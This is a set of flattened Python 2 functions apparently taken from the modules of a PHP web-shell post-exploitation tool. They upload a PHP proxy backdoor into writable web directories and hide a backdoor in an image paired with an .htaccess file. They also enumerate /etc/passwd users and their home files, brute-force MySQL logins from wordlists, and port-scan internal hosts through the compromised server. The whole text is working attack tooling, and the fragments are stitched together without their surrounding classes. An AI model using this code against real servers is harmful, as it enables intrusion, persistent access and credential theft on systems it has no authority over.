def run_module(self, rpath, finddir): rname = ''.join(choice(letters) for i in xrange(4)) + '.php' if not rpath and finddir: path, url = self.__find_writable_dir(finddir) if not (path and url): raise ModuleException( self.name, 'Writable dir in \'%s\' not found. Specify writable dir using \':net.php_proxy rpath=writable_dir/proxy.php\'' % finddir) else: path = path + rname url = url + rname else: if not rpath.endswith('.php'): raise ModuleException( self.name, 'Remote PHP path must ends with \'.php\'') path = rpath url = None if path: phpfile = self.__get_backdoor() response = self.__upload_file_content(phpfile, path) if response: if url: self.mprint( '[%s] PHP proxy script uploaded. Go with your browser to %s?u=http://www.google.com\'' % (self.name, url)) else: self.mprint( '[%s] PHP proxy script uploaded. Go with your browser to script URL followed by ?u=http://www.google.com\'' % (self.name)) self.mprint( '[%s] When finished remove \'%s\' and \'ses_*\' files created in the same folder' % (self.name, path)) return raise ModuleException( self.name, "Error installing remote PHP proxy, check uploading path")
def __prepare_payload(self, vector, parameters, payloadnum=0): if vector.payloads[payloadnum].count('%s') == len(parameters): return vector.payloads[payloadnum] % tuple(parameters) else: raise ModuleException( self.name, "Error payload parameter number does not corresponds")
def run_module( self, filename, host, port): wl_splitted = [] if filename != 'auto': try: wordlist = open(filename, 'r') wl_splitted = [ w.strip() for w in wordlist.read().split() ] except Exception, e: raise ModuleException(self.name, "Error opening %s: %s" % (filename, str(e)))
def run_module( self, local_path, remote_path): if not self.file_content: try: local_file = open(local_path, 'r') except Exception, e: raise ModuleException(self.name, "Open file '%s' failed" % (local_path)) file_content = local_file.read()
def run_module(self, local_path, remote_path, chunksize): if self.modhandler.load('file.check').run({ 'rpath': remote_path, 'mode': 'exists' }): raise ModuleException( self.name, "Remote file already exists, delete it with \':file.rm %s\'" % (remote_path)) if not self.file_content: try: local_file = open(local_path, 'r') except Exception, e: raise ModuleException(self.name, "Open file '%s' failed" % (local_path)) file_content = local_file.read()
def __get_backdoor(self): backdoor_path = self.modhandler.path_modules + '/net/external/phpproxy.php' try: f = open(backdoor_path) except IOError: raise ModuleException(self.name, "'%s' not found" % backdoor_path) return f.read()
def run_module(self, filter_real_users): vectors = self._get_default_vector2() if not vectors: vectors = self.vectors.get_vectors_by_interpreters( self.modhandler.loaded_shells) for vector in vectors: response = self.__execute_payload(vector, [filter_real_users]) if response != None: return response raise ModuleException(self.name, "Users enumeration failed")
def run_module( self, mode, user, pwd , db, table, host ): if mode != 'mysql': raise ModuleException(self.name, "Only 'mysql' database is supported so far") vectors = self._get_default_vector2() if not vectors: vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells + [ 'sql.query' ]) for vector in vectors: response = self.__execute_payload(vector, [mode, host, user, pwd, db, table]) if response != None: self.params.set_and_check_parameters({'vector' : vector.name}) return response
def run_module(self, list_path, printall): if not self.pathdict and list_path: try: list = open(os.path.expanduser(list_path), 'r').read().splitlines() self.set_list(list) except: raise ModuleException( self.name, "Error opening path list \'%s\'" % list_path) else: list = self.pathdict.keys() self.mprint('[%s] Enumerating %i paths' % (self.name, len(list))) for path in list: output = path + '' + '\t' * (3 - ((len(path) + 1) / 8)) if self.modhandler.load('file.check').run({ 'rpath': path, 'mode': 'exists' }): output += '\texists' self.pathdict[path][0] = 1 if self.modhandler.load('file.check').run({ 'rpath': path, 'mode': 'r' }): self.pathdict[path][1] = 1 output += ', +readable' if self.modhandler.load('file.check').run({ 'rpath': path, 'mode': 'w' }): self.pathdict[path][2] = 1 output += ', +writable' if self.modhandler.load('file.check').run({ 'rpath': path, 'mode': 'x' }): self.pathdict[path][3] = 1 output += ', +excutable' self.mprint(output) elif printall: self.mprint(output)
def __process_response(self,response, remote_path, local_path): if self.vector.name == 'copy' or self.vector.name == 'symlink': if not self.file_path.endswith('.html') and not self.file_path.endswith('.htm'): self.mprint("[%s] Warning, method '%s' use HTTP file download. Assure that remote file\n[%s] has a downloadable extension like 'html', or use another vector" % (self.name, self.vector.name, self.name)) if self.modhandler.load('file.check').run({'rpath' : self.file_path, 'mode': 'exists'}): response = Request(self.url).read() if self.modhandler.load('shell.php').run({0: "unlink('%s') && print('1');" % self.file_path}) != '1': self.mprint("[!] [%s] Error cleaning support file %s" % (self.name, self.file_path)) else: self.mprint("[!] [%s] Error checking existance of %s" % (self.name, self.file_path)) else: if self.encoder_callable: try: response = b64decode(response) except TypeError: self.mprint("[!] [%s] Error, unexpected file content" % (self.name)) if response: try: f = open(local_path,'wb') f.write(response) f.close() except Exception, e: self.mprint('[!] [%s] Some error occurred writing local file \'%s\'.' % (self.name, local_path)) raise ModuleException(self.name, e) response_md5 = md5(response).hexdigest() remote_md5 = self.modhandler.load('file.check').run({'rpath' : remote_path, 'mode' : 'md5'}) if not remote_md5: self.mprint('[!] [%s] MD5 hash method is not callable with \'%s\', check disabled' % (self.name, remote_path)) return response elif not remote_md5 == response_md5: self.mprint('[%s] MD5 hash of \'%s\' file mismatch, file corrupted' % (self.name, local_path)) else: self.mprint('[%s] File correctly downloaded to \'%s\'.' % (self.name, local_path)) return response
def run_module(self, type, path): vectors = self._get_default_vector2() if not vectors: vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells) for vector in vectors: response = self.__execute_payload(vector, [type, path]) if response != None: self.params.set_and_check_parameters({'vector' : vector.name}) return response raise ModuleException(self.name, "Files not found")
def run_module(self, url, home, depth_limit): confine_prefix = url exclude = '' if home[-1] != '/': home = home + '/' self.mprint('[%s] Crawling paths in %s (depth %i)' % (self.name, url, depth_limit)) try: crawler = Crawler(url, depth_limit, confine_prefix, exclude) crawler.crawl() except Exception, e: raise ModuleException(self.name, "Crawler exception: %s" % str(e))
def _probe(self): vectors = self._get_default_vector2() if not vectors: vectors = self.vectors.get_vectors_by_interpreters( self.modhandler.loaded_shells) for vector in vectors: response = self.__execute_probe(vector) if response: self.payload = vector.payloads[0] return raise ModuleException("shell.sh", "Shell interpreter initialization failed")
def __process_response(self, response, remote_path, local_path): if self.vector.name == 'copy' or self.vector.name == 'symlink': if not self.file_path.endswith('.html') and not self.file_path.endswith('.htm'): self.mprint("[%s] Warning: vector '%s' works better with files with downloadable extension like '.html'" % (self.name, self.vector.name)) if self.modhandler.load('file.check').run({'rpath' : self.file_path, 'mode': 'exists'}): response = Request(self.url).read() else: response = None # Force deleting. Does not check existance, because broken links returns False self.modhandler.load('file.rm').run({'rpath' : self.file_path, 'recursive': False}) else: if self.encoder_callable: try: response = b64decode(response) except TypeError: self.mprint("[!] [%s] Error, unexpected file content" % (self.name)) if response: try: f = open(local_path,'wb') f.write(response) f.close() except Exception, e: self.mprint('[!] [%s] Some error occurred writing local file \'%s\'.' % (self.name, local_path)) raise ModuleException(self.name, e) response_md5 = md5(response).hexdigest() remote_md5 = self.modhandler.load('file.check').run({'rpath' : remote_path, 'mode' : 'md5'}) if not remote_md5: self.mprint('[!] [%s] MD5 hash method is not callable with \'%s\', check disabled' % (self.name, remote_path)) return response elif not remote_md5 == response_md5: self.mprint('[%s] MD5 hash of \'%s\' file mismatch, file corrupted' % (self.name, local_path)) else: self.mprint('[%s] File correctly downloaded to \'%s\'.' % (self.name, local_path)) return response
def run_module(self, remote_path): file = NamedTemporaryFile() file.close() # Passing vector to file.download self.modhandler.load('file.download').params.set_and_check_parameters({'vector':self.params.get_parameter_value('vector')}) self.modhandler.set_verbosity(2) self.modhandler.load('file.download').run({'rpath' : remote_path, 'lpath' : file.name}) self.modhandler.set_verbosity() response = self.modhandler.load('file.download').get_last_read_file() if response and path.exists(file.name): remove(file.name) return response raise ModuleException(self.name, "File read failed")
def run_module(self, auto, list, path): custom_files = [] if list != None: try: custom_files = open(list, 'r').read().splitlines() except: raise ModuleException(self.name, "Error opening path list \'%s\'" % list) elif path != None: custom_files = path.split(',') elif auto: if auto == 'any': custom_files = self.common_files['home'] + self.common_files[ 'web'] else: custom_files = self.common_files[auto] else: print '[!] Error, required one of this parameters: %s' % ( self.params.summary()) return self.modhandler.set_verbosity(2) self.modhandler.load('audit.etc_passwd').run({'filter': 'True'}) self.modhandler.set_verbosity() path_list = [] user_dict = self.modhandler.load('audit.etc_passwd').usersinfo self.mprint('[%s] Enumerating %i users' % (self.name, len(user_dict.keys()))) for username in user_dict: for f in custom_files: path_list.append(user_dict[username].home + '/' + f) if path_list: self.modhandler.load('file.enum').set_list(path_list) self.modhandler.load('file.enum').run({'lpath': ''})
def _probe(self): for currentmode in self.modes: rand = str(random.randint( 11111, 99999 )) self.current_mode = currentmode if self.run_module('echo %s;' % (rand)) == rand: self.params.set_and_check_parameters({'mode' : currentmode}, False) break if not self.current_mode: raise ModuleException(self.name, "PHP interpreter initialization failed") else: if self.run_module('is_callable("is_dir") && is_callable("chdir") && is_callable("getcwd") && print(1);') != '1': self.mprint('[!] Error testing directory change methods, \'cd\' and \'ls\' will not work.') else: self.cwd_vector = "chdir('%s'); %s"
def run_module(self, addr, port, onlyknownports, portsperreq): port_list_path = None if onlyknownports: port_list_path = 'modules/net/external/nmap-services-tcp' self.reqlist = RequestList(self.modhandler, port_list_path) self.reqlist.add(addr, port) if not self.reqlist: raise ModuleException(self.name, 'Invalid scan range, check hosts and ports') hostnum = len(self.reqlist) portnum = len(self.reqlist.port_list) reqnum = (portnum * hostnum / portsperreq) + 1 self.mprint( '[%s] Scanning %i ports of %i hosts using %i requests (%i connections per request)' % (self.name, portnum, hostnum, reqnum, portsperreq)) if onlyknownports: known_ports_string = '[%s] Only known ports scanned.' % self.name while self.reqlist: reqstringarray = '' requests = self.reqlist.get_requests(portsperreq) for host, ports in requests.items(): reqstringarray += '%s %s,' % (host, '|'.join(map(str, (ports)))) reqstringarray = '%s' % reqstringarray[:-1] payload = self.vector_scan % (self.rand_post_addr) self.modhandler.load('shell.php').set_post_data( {self.rand_post_addr: b64encode(reqstringarray)}) response = self.modhandler.load('shell.php').run({0: payload}) print response
def run_module(self, remote_path, local_path): vectors = self._get_default_vector2() if not vectors: vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells) for vector in vectors: response = self.__execute_payload(vector, [remote_path, local_path]) if response != None: file_response = self.__process_response(response, remote_path, local_path) self.params.set_and_check_parameters({'vector' : self.vector.name}) self.lastreadfile = file_response return raise ModuleException(self.name, "File read failed")
def run_module(self, rpath, recursive): vectors = self._get_default_vector2() if not vectors: vectors = self.vectors.get_vectors_by_interpreters( self.modhandler.loaded_shells) for vector in vectors: response = self.__execute_payload(vector, [rpath, recursive]) if 'OK' in response: self.params.set_and_check_parameters({'vector': vector.name}) return True recursive_output = '' if not recursive: recursive_output = ' and use \'recursive\' with unempty folders' raise ModuleException( self.name, "Delete fail, check existance and permissions%s." % (recursive_output))
def run_module( self, mode, user, filename, start_line, host): if start_line == 'all': start_line = 0 if 'localhost' not in host and '127.0.0.1' not in host: self.chunksize = 20 if self.substitutive_wl: wl_splitted = self.substitutive_wl[:] self.substitutive_wl = [] else: try: wordlist = open(filename, 'r') except Exception, e: raise ModuleException(self.name, "%s" % (str(e))) wl_splitted = [ w.strip() for w in wordlist.read().split() ]
def run_module( self, mode, user, pwd, query, host): if mode == 'mysql': sql_connect = "mysql_connect" sql_query = "mysql_query" sql_fetch = "mysql_fetch_row" elif mode == 'postgres': sql_connect = "pg_connect" sql_query = "pg_query" sql_fetch = "pg_fetch_row" else: raise ModuleException(self.name, "Database '%s' unsupported" % (mode)) vectors = self._get_default_vector2() if not vectors: vectors = self.vectors.get_vectors_by_interpreters(self.modhandler.loaded_shells) for vector in vectors: response = self.__execute_payload(vector, [sql_connect, sql_query, sql_fetch, host, user, pwd, query]) if response != None: self.params.set_and_check_parameters({'vector' : vector.name}) return response
def run_module(self): ifconfig = self.__find_ifconfig_path() try: response = self.modhandler.load('shell.sh').run({ 0 : ifconfig}) except ModuleException: response = None if response: ifaces = re.findall(r'^(\S+).*?inet addr:(\S+).*?Mask:(\S+)', response, re.S | re.M) if ifaces: for i in ifaces: ipnet = IPNetwork('%s/%s' % (i[1], i[2])) self.ifaces[i[0]] = ipnet self.mprint('%s: %s' % (i[0], ipnet)) else: raise ModuleException(self.name, "No interfaces infos found")
def __init__(self, modhandler, port_list_path): self.modhandler = modhandler self.port_list = [] self.ifaces = {} self.nmap_ports = [] self.nmap_services = {} if port_list_path: try: nmap_file = open(port_list_path, 'r') except: raise ModuleException( self.name, 'Error opening \'%s\' port file' % port_list_path) for line in nmap_file.readlines(): name, port = line[:-1].split() self.nmap_services[int(port)] = name self.nmap_ports.append(int(port)) dict.__init__(self)
writable_dirs = self.__enumerate_writable_dirs(start_path) for dir_path in writable_dirs: if not dir_path[-1] == '/': dir_path += '/' file_path = dir_path + self.probe_filename file_url = http_root + file_path.replace(start_path, '') dir_url = http_root + dir_path.replace(start_path, '') if self.__upload_file_content( '1', file_path) and self.__check_remote_test_file( file_path) and self.__check_remote_test_url( file_url): self.dir = dir_path self.url = dir_url self.__remove_remote_test_file(file_path) if self.dir and self.url: self.mprint( "[find.webdir] Found writable web dir %s -> %s" % (self.dir, self.url)) return True raise ModuleException(self.name, "Writable web directory not found")
except Exception, e: raise ModuleException(self.name, str(e)) test_output = getoutput('php %s' % output_img_test) unlink(output_img_test) if 'TEST OK' in test_output: try: out = file(output_img, 'w') out.write( '%s%s' % (input_img_data, str(self.backdoor).replace('\n', ' '))) out.close() except Exception, e: raise ModuleException(self.name, str(e)) else: raise ModuleException( self.name, '[%s] Error testing backdoor in image \'%s\'. Choose simpler image as an empty gif file' % (self.name, output_img_test)) try: hout = file(output_htaccess, 'wt') hout.write(self.htaccess_template % input_img_ext) hout.close() except Exception, e: raise ModuleException(self.name, str(e))